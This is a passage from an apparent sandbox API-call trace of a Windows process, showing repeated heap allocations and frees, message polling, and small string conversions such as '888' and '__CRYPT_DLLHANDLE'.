lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0227.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0227.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0227.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0227.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0227.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0227.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0227.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0227.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0227.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0227.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0227.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0227.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0227.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0227.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5f8 | out: hHeap=0x970000) returned 1 [0227.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0227.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0227.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0227.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0227.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0227.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0227.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0227.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0227.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0227.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0227.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0227.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0227.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0227.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0227.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0227.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0227.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0227.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0227.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0227.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0227.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0227.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0227.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0227.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0227.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0227.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0227.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0227.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0227.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0227.726] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0227.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0227.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0227.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0227.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0227.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0227.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0227.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0227.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0227.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0227.727] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0227.727] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0227.727] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0227.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0227.728] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0227.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0227.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0227.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0227.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0227.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0227.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0227.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0227.728] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0227.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0227.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0227.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0227.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0227.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0227.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0227.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0227.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0227.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0227.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0227.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0227.728] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0227.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e55048 [0227.728] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0227.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0227.729] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0227.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0227.729] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e55008, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0227.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0227.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0227.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0227.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0227.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0227.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0227.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0227.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0227.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0227.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0227.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0227.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0227.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0227.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0227.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0227.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0227.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0227.729] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0227.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0227.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0227.729] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0227.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0227.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ba8 [0227.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0227.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0227.730] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0227.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977998 [0227.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0227.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0227.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0227.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0227.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0227.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0227.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0227.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0227.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0227.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0227.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0227.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0227.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0227.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0227.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0227.730] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e55008 [0227.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0227.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0227.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0227.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0227.730] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0227.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0227.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0227.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0227.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0227.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0227.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0227.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c08 [0227.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x9778d8 [0227.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0227.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0227.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0227.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0227.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977998 | out: hHeap=0x970000) returned 1 [0227.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0227.731] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0227.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0227.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0227.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0227.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0227.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977a28 [0227.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0227.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0227.731] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0227.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0227.731] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0227.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0227.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0227.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0227.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0227.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0227.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54f98 [0227.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0227.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0227.732] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0227.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0227.732] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54fc8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0227.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0227.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0227.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0227.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0227.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0227.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0227.732] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e550b8 [0227.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0227.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0227.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977a28 | out: hHeap=0x970000) returned 1 [0227.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0227.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0227.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0227.732] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0227.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0227.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0227.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0227.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0227.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0227.733] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0227.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0227.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0227.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0227.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0227.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04268 [0227.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0227.733] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0227.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04268 | out: hHeap=0x970000) returned 1 [0227.733] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0227.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51088 [0227.733] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0227.734] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0227.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0227.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0227.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0227.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0227.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0227.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0227.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0227.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0227.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0227.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0227.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0227.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0227.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0227.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0227.734] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0227.734] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0227.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0227.735] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0227.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0227.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f558 [0227.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0227.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0227.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0227.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0227.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0227.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0227.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0227.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0227.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0227.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0227.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0227.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977bd8 [0227.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0227.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0227.736] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0227.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0227.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0227.736] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0227.737] HeapFree (in: 